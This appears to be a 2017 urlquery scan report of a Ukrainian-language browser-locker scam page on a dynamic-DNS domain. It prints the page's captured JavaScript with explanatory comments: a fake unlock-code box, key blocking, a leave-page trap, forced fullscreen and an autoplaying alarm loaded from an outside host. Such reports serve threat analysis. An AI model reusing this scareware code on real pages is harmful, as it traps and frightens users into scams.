Overview

URL: oshibka-interneta.bbsindex.com/4369/102/ua.php
IP: 37.1.206.130
ASN: AS50673 Serverius Holding B.V.
Location: Netherlands
Report completed: 2017-09-01 06:25:50 CEST
urlquery Alerts: DynDNS domain detected


Settings

UserAgent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer:
Pool:
Access Level:


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp | Severity | Source IP | Destination IP | Alert
2017-09-01 06:25:06 CEST | 2 | Client IP | 37.1.206.130 | ET INFO DYNAMIC_DNS HTTP Request to a *.bbsindex.com Domain


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter  No alerts detected
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 2 reports on IP: 37.1.206.130

Date | UQ / IDS / BL | URL | IP
2017-09-01 01:54:27 +0200 | 6 - 0 - 0 | oshibka-interneta.bbsindex.com/4369/102/ua.php | 37.1.206.130
2017-08-21 23:28:59 +0200 | 3 - 3 - 0 | gov-mvs-ua.4irc.com/121ua/ua.php | 37.1.206.130

Last 10 reports on ASN: AS50673 Serverius Holding B.V.

Date | UQ / IDS / BL | URL | IP
2019-06-26 13:06:17 +0200 | 0 - 0 - 38 | https://naijaextra.com/ | 93.158.208.37
2019-06-26 06:30:14 +0200 | 0 - 0 - 0 | vkpornodepfile.com | 37.1.205.41
2019-06-26 00:56:16 +0200 | 0 - 0 - 0 | 5.45.79.15/input/?mark=20190619-togwebwp.azur (...) | 5.45.79.15
2019-06-25 17:18:28 +0200 | 0 - 0 - 0 | tre.tithis.com | 185.53.163.220
2019-06-25 04:02:54 +0200 | 0 - 0 - 0 | 5.45.79.15/input/?mark=20190623-www.relations (...) | 5.45.79.15
2019-06-21 09:06:12 +0200 | 0 - 0 - 0 | https://2conv.com/youtube-mp3/ | 5.45.73.21
2019-06-21 04:13:19 +0200 | 0 - 0 - 1 | 5.45.79.15/input/?mark=20190620-www.rksoundse (...) | 5.45.79.15
2019-06-20 11:26:05 +0200 | 0 - 0 - 0 | teenphotoclub.net/ | 5.45.67.187
2019-06-20 08:08:12 +0200 | 0 - 0 - 0 | 5.45.79.15/input/?mark=20190619-h2806836.stra (...) | 5.45.79.15
2019-06-20 02:52:33 +0200 | 0 - 0 - 1 | www.officesaceserver.net/login.php | 5.255.86.108

No other reports on domain: bbsindex.com



JavaScript

Executed Scripts (21)


Executed Evals (10)

#1 JavaScript::Eval (size: 747, repeated: 1) - SHA256: 0074b430435a31b096d6bf538253c8055b7d472e0233c0b33881f2f9cb88dc15

// Eval #1: fake "unlock code" handler of the locker page. Entering a code only
// animates a row of dashes and then shows an error; no code is accepted.
// The two Cyrillic strings were recovered from cp1251 mojibake in the report:
// "Введите код разблокировки..." = "Enter the unlock code...",
// "Введен неверный код!" = "Invalid code entered!".
// `on` (not `on_div`) is what the body uses; it resolves to the element with id="on".
var on_div = document.getElementById("on");

function cod() {
    onfocus = this.value == 'Введите код разблокировки...';
    on.innerHTML = '<font color="#6b6b6b">---</font>';
    setTimeout(function() {
        on.innerHTML = '<font color="#6b6b6b">--- ---</font>';
    }, 300);
    setTimeout(function() {
        on.innerHTML = '<font color="#6b6b6b">--- --- ---</font>';
    }, 600);
    setTimeout(function() {
        on.innerHTML = '<font color="#6b6b6b">--- --- --- ---</font>';
    }, 900);
    setTimeout(function() {
        on.innerHTML = '<font color="#6b6b6b">--- --- --- --- ---</font>';
    }, 1200);
    setTimeout(function() {
        on.innerHTML = '<font color="#c30000">Введен неверный код!</font>';
    }, 1500);
}

#2 JavaScript::Eval (size: 410, repeated: 1) - SHA256: b8937ed987c41447e7fe794db35c4ecaae8d027b3f9a48fe40689a64311f15e7

// Eval #2: suppresses keys the victim would use to escape or inspect the page:
// Esc (27), Alt (18), F12 (123), U (85), Tab (9), F4 (115), F5 (116),
// F1 (112), F3 (114), Ctrl (17); on keypress, character codes 123 and 117.
window.onkeydown = function(evt) {
    if (evt.keyCode == 27 || evt.keyCode == 18 || evt.keyCode == 123 || evt.keyCode == 85 || evt.keyCode == 9 || evt.keyCode == 115 || evt.keyCode == 116 || evt.keyCode == 112 || evt.keyCode == 114 || evt.keyCode == 17) {
        return false;
    }
};
window.onkeypress = function(evn) {
    if (evn.keyCode == 123 || evn.keyCode == 117) return false;
};

#3 JavaScript::Eval (size: 129, repeated: 1) - SHA256: 1512d38f1de07a9ba9e19f7d64811213029986449c2a395695c828583d68680e

// Eval #3: onbeforeunload handler that raises an alert and a leave-page prompt when
// the victim tries to navigate away. The string arguments are garbled in the report
// and are left exactly as captured.
onbeforeunload = function() {
    alert(""
        ESC, '"+  +", !" &#!");   return "" ESC, '
        "+  +", !" &#!";
    }

#4 JavaScript::Eval (size: 323, repeated: 1) - SHA256: f805bd55ffd272422c8e74f0953a6affd88e770e058edc6488db3e747417c626

// Eval #4: on F11 (122), Ctrl (17), Alt (18) or Enter (13) keyup, force fullscreen
// and inject an autoplaying audio element (alarm sound) into #sound.
document.addEventListener('keyup', function(e) {
    if (e.keyCode == 122 || e.keyCode == 17 || e.keyCode == 18 || e.keyCode == 13) {
        toggleFullScreen();
        document.getElementById('sound').innerHTML = "<audio autoplay='autoplay'><source src='http://polariton.ad-l.ink/download/action/8bx2cmRy5/mp3'/></audio>";
    }
}, false);

#5 JavaScript::Eval (size: 267, repeated: 1) - SHA256: d4697b1ebe7683afd51a70f3354aaea8ed131210563f495298c1d2c1667b7fe0

// Eval #5: same as #4 but triggered by Esc (27), so leaving fullscreen re-enters it.
document.addEventListener('keyup', function(es) {
    if (es.keyCode == 27) {
        toggleFullScreen();
        document.getElementById('sound').innerHTML = "<audio autoplay='autoplay'><source src='http://polariton.ad-l.ink/download/action/8bx2cmRy5/mp3'/></audio>";
    }
}, false);

#6 JavaScript::Eval (size: 532, repeated: 1) - SHA256: 9b4aa32b6ee8f6da951ff72075972a13e0feedb60f0a95813300dae82c007b13

// Eval #6: live clock for the fake "official" screen, written to #timedisplay.
// setInterval with a 0 ms delay keeps the handler firing continuously.
function getDate() {
    var date = new Date();
    var hours = date.getHours();
    var minutes = date.getMinutes();
    var seconds = date.getSeconds();
    var day = date.getDate();
    var month = date.getMonth() + 1;
    var year = date.getFullYear();
    if (minutes < 10) {
        minutes = '0' + minutes;
    }
    if (seconds < 10) {
        seconds = '0' + seconds;
    }
    document.getElementById('timedisplay').innerHTML = hours + ':' + minutes + ':' + seconds + '<br>' + day + '.' + month + '.' + year;
}
setInterval(getDate, 0);

#7 JavaScript::Eval (size: 194, repeated: 1) - SHA256: fa7bb2f305a2c599655ebf5a2e8a90ad6d42e1cbafbddd96c6ee82f6e3ccb4fd

// Eval #7: toggles visibility of the #world element.
function hello() {
    var p = document.getElementById('world');
    if (p.style.display == 'none') {
        p.style.display = 'block';
    } else {
        p.style.display = 'none';
    }
}

#8 JavaScript::Eval (size: 82, repeated: 1) - SHA256: eaad64e38398ebd625a861d33eb6c215ad5cbfbb9c1733359272d20633292b36

// Eval #8: shows the element with the given id (used by #10 for the locker panels).
function viewdiv(id) {
    var el = document.getElementById(id);
    el.style.display = "block";
}

#9 JavaScript::Eval (size: 523, repeated: 1) - SHA256: 50b0a678ce834ba30cb9d84636bf7376c03ce7d0bb2559cb270d657bd630fe0b

// Eval #9: defines toggleFullScreen only when the page-level variable `key`
// holds the expected value; the other evals call it unconditionally.
// Requests fullscreen via the standard, Mozilla and WebKit prefixed APIs.
if (key == 'jwsf72efuju2') {
    function toggleFullScreen() {
        if (!document.fullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement) {
            if (document.documentElement.requestFullscreen) {
                document.documentElement.requestFullscreen();
            } else if (document.documentElement.mozRequestFullScreen) {
                document.documentElement.mozRequestFullScreen();
            } else if (document.documentElement.webkitRequestFullscreen) {
                document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT);
            }
        }
    }
}

#10 JavaScript::Eval (size: 502, repeated: 1) - SHA256: b5410693328b03022bf9114c99cbbc12b9bad402cb5d6d2bc803cea4c01c0607

// Eval #10: the first click anywhere forces fullscreen, sets a "not-allowed" cursor,
// fills #map with the page-level variable `stroka`, reveals the locker panels and
// starts the autoplaying audio. `event`, `target` and `stroka` are page globals.
window.onload = function() {
    document.onclick = function(e) {
        e = e || event;
        target = e.target || e.srcElement;
        toggleFullScreen();
        document.body.style.cursor = 'not-allowed';
        document.getElementById('map').innerHTML = stroka;
        viewdiv('mydiv');
        viewdiv('mypanel');
        document.getElementById('sound').innerHTML = "<audio autoplay='autoplay'><source src='http://polariton.ad-l.ink/download/action/8bx2cmRy5/mp3'/></audio>";
    }
}

Executed Writes (0)



HTTP Transactions (8)


#1

Request:
GET /4369/102/ua.php HTTP/1.1
Host: oshibka-interneta.bbsindex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response (from 37.1.206.130):
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: nginx
Date: Fri, 01 Sep 2017 04:25:06 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
X-Powered-By: PHP/5.4.34
Content-Encoding: gzip

--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   257214
Md5:    478a9ea02dcd66751f084d336a2d95d2
Sha1:   3d41557e0e1563f381a93fbd694c8fc4aa892500
Sha256: 4c053624262e76657a13510c500c30321638c969060c4d11187a85aecf7befcd

Alerts:
  urlquery:
    - DynDNS domain detected

#2

Request:
GET /4369/102/aloha/pop.js HTTP/1.1
Host: oshibka-interneta.bbsindex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://oshibka-interneta.bbsindex.com/4369/102/ua.php

Response (from 37.1.206.130):
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: nginx
Date: Fri, 01 Sep 2017 04:25:06 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Last-Modified: Wed, 30 Aug 2017 08:49:08 GMT
Etag: W/"1ec9-589-557f499dde3a4"
Content-Encoding: gzip

--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   721
Md5:    541e68c03a7ba5ad0a25800b9162b43b
Sha1:   a2aedfaa49ce5e5cc3ea934793aec83ff5b36b57
Sha256: 4d3aa572dd8cfbe400b21b7bedbcd319ef9557ef8dc11d3905021c1086595a13

Alerts:
  urlquery:
    - DynDNS domain detected

#3

Request:
GET /4369/102/scripts.js HTTP/1.1
Host: oshibka-interneta.bbsindex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://oshibka-interneta.bbsindex.com/4369/102/ua.php

Response (from 37.1.206.130):
HTTP/1.1 200 OK
Content-Type: text/javascript
Server: nginx
Date: Fri, 01 Sep 2017 04:25:06 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Last-Modified: Thu, 24 Aug 2017 03:01:29 GMT
Etag: W/"1daf8-f16-557770b7cb440"
Content-Encoding: gzip

--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1742
Md5:    7cb6c0dffa68faee978dab73873d2d78
Sha1:   ac774a8011475c33fb73e10a79dd82ea1f2423a6
Sha256: 4728008fea0275d1f3dc89088341c0d9d9a245ecd8bc2e9fec853e0511d915a5

Alerts:
  urlquery:
    - DynDNS domain detected

#4

Request:
GET /4369/102/pop.js HTTP/1.1
Host: oshibka-interneta.bbsindex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://oshibka-interneta.bbsindex.com/4369/102/ua.php

Response (from 37.1.206.130):
HTTP/1.1 200 OK
Content-Type: text/javascript
Server: nginx
Date: Fri, 01 Sep 2017 04:25:06 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Last-Modified: Thu, 24 Aug 2017 03:01:29 GMT
Etag: W/"1daf6-3dbd1-557770b7cb440"
Content-Encoding: gzip

--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   73547
Md5:    3430df7738a446d5af890fe52cedc830
Sha1:   58b8dc9be64732d863554fc3935e8be5fe956545
Sha256: 3eba3f16e572c7fadcc60154af4bc73db1500dcdda1d5aadd1dc6ec49adc5c5f

Alerts:
  urlquery:
    - DynDNS domain detected
  IDS:
    - ET INFO DYNAMIC_DNS HTTP Request to a *.bbsindex.com Domain

#5

Request:
GET /analytics.js HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://oshibka-interneta.bbsindex.com/4369/102/ua.php
If-Modified-Since: Fri, 03 Oct 2014 00:48:42 GMT

Response (from 216.58.211.142):
HTTP/1.1 200 OK
Content-Type: text/javascript
Strict-Transport-Security: max-age=10886400; includeSubDomains; preload
Timing-Allow-Origin: *
Date: Fri, 01 Sep 2017 02:50:37 GMT
Expires: Fri, 01 Sep 2017 04:50:37 GMT
Last-Modified: Thu, 17 Aug 2017 01:11:09 GMT
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 13472
Cache-Control: public, max-age=7200
Age: 5670

--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   13472
Md5:    b9b86922042a652c2ab95127f5d56fb1
Sha1:   ab415059ac440b2dc5aa4618e99df56b4f648222
Sha256: 9984b80ed589c69864d7fa2d664e83db447b4cafc4b7beeeea3c14a0818b519f

#6

Request:
GET /widgets.js HTTP/1.1
Host: platform.twitter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://oshibka-interneta.bbsindex.com/4369/102/ua.php

Response (from 199.96.57.6):
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
Last-Modified: Wed, 23 Aug 2017 21:14:25 GMT
Cache-Control: public, max-age=1800
Etag: "83699f09f4bcebaa10462e1f37e208b4+gzip"
Content-Encoding: gzip
Content-Length: 33398
Accept-Ranges: bytes
Date: Fri, 01 Sep 2017 04:25:07 GMT
Via: 1.1 varnish
Age: 475
Connection: keep-alive
X-Served-By: cache-tw-sto1-2-TWSTO1
X-Cache: HIT
X-Timer: S1504239907.293150,VS0,VE0
Vary: Accept-Encoding,Host
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   33398
Md5:    0a1bc155cc34459fc2a6c9fd13b4cc3b
Sha1:   ddf696e15141d8c5668fef5774522eafce9e84a5
Sha256: ae2f022931dd9de12a185655c5067170a43277e9ea1d9eecee8920ea2a51afd3

#7

Request:
GET /favicon.ico HTTP/1.1
Host: oshibka-interneta.bbsindex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response (from 37.1.206.130):
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: nginx
Date: Fri, 01 Sep 2017 04:25:08 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Last-Modified: Wed, 30 Aug 2017 08:49:08 GMT
Etag: W/"1ec9-589-557f499dde3a4"
Content-Encoding: gzip

--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   721
Md5:    541e68c03a7ba5ad0a25800b9162b43b
Sha1:   a2aedfaa49ce5e5cc3ea934793aec83ff5b36b57
Sha256: 4d3aa572dd8cfbe400b21b7bedbcd319ef9557ef8dc11d3905021c1086595a13

Alerts:
  urlquery:
    - DynDNS domain detected

#8

Request:
GET /favicon.ico HTTP/1.1
Host: oshibka-interneta.bbsindex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response (from 37.1.206.130):
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: nginx
Date: Fri, 01 Sep 2017 04:25:11 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Last-Modified: Wed, 30 Aug 2017 08:49:08 GMT
Etag: W/"1ec9-589-557f499dde3a4"
Content-Encoding: gzip

--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   721
Md5:    541e68c03a7ba5ad0a25800b9162b43b
Sha1:   a2aedfaa49ce5e5cc3ea934793aec83ff5b36b57
Sha256: 4d3aa572dd8cfbe400b21b7bedbcd319ef9557ef8dc11d3905021c1086595a13

Alerts:
  urlquery:
    - DynDNS domain detected